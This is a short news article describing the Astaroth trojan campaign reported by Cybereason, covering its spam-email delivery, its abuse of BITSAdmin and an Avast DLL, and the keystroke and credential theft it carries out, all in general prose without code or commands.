Astaroth, the fake image that steals your data

A trojan disguised as an image manages to infect PCs and avoid being recognized by antivirus. Here's how Astaroth works

These days a new hacker campaign is underway in Brazil and Europe with the Astaroth trojan, already known to computer security experts because it infected thousands of computers worldwide in the last three months of 2018. The infection starts from a fake image, spread via email.

The new strain of the trojan was discovered by Cybereason researchers and also uses BITSAdmin, an official Microsoft Windows utility designed to facilitate download or upload operations, but used by the trojan to download malicious code. This variant of Astaroth is distributed via spam email campaigns and the infection starts with the user opening a .7zip archive attached to the email or inserted into a link or a Gif or Jpg image. The malicious archive contains an .lnk file which initiates the actual infection. Next, the malware connects to a server and starts stealing information on the infected computer. Then it uses BITSAdmin to fetch more images and files from another server.

Immune to antivirus

The very dangerous thing about Astaroth, and the novelty compared to previous infections based on this trojan, is its ability to modify a .dll file used by Avast antivirus by injecting malicious code into it. Through this file, after infecting it, the trojan manages to steal more information about the machine it is running on and download more code. Moreover, it also manages to hide itself in case of an antivirus scan performed with Avast.

What Astaroth does

The Cybereason research team found out that once the trojan has successfully infiltrated, it records users' keystrokes, intercepts their calls to the operating system and continuously collects all the information saved in the clipboard. With these methods, it collects significant amounts of personal information, including information about the user's bank accounts. And if the infected PC is connected to a LAN, Astaroth also manages to collect the network access passwords of all other computers connected to the same LAN, mail account passwords, Messenger account data, Internet Explorer passwords.

Astaroth made its first appearance online in 2017, and then infected thousands of PCs especially in South America. It had several evolutions before arriving at the current one. A previous version, for example, hid in fake Amazon emails containing confirmations of orders that were never placed by the user. But if the user clicked on the links contained in the email, the infection started.